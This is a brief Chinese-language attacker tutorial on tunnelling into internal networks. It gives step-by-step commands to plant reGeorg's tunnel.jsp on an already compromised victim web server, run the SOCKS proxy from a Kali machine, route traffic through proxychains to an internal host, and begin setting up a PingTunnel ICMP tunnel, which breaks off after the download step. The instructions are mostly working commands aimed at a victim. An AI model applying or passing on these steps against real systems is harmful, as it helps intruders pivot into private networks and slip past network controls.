基于HTTP协议
reGeorg搭建HTTP隧道
1 配置服务端
下载reGeorg
git clone https://github.com/sensepost/reGeorg.git
在已经getshell的受害者服务器上的http服务器的web根目录上传一个tunnel.jsp传完后,
测试是否可以访问到
curl http://服务端ip:8080/tunnel.jsp
服务器返回Georg says, 'All seems fine'
服务器端配置完成
2、在攻击者机子上,下载reGeorg运行脚本,设置一个端口3333作为http隧道的端口
python reGeorgSocksProxy.py -l 0.0.0.0 -p 3333 -u http://x.x.x.x:8080/tunnel.jsp
3、打开kali攻击机的proxychain设置,设置一下代理。将代理设置为vps的ip的3333端口
vim/etc/proxychains.conf
在最后添加一条
socks5 本地ip 3333
在kali上通过代理访问内网的服务器
proxychains curl http://172.17.0.2/login.php
基于ICMP协议
pingtunnel搭建icmp隧道
下载Pingtunnel:
wget http://www.cs.uit.no/~daniels/PingTunnel/PingTunnel-0.72.tar.gz
tar -xzvf PingTunnel-0.72.tar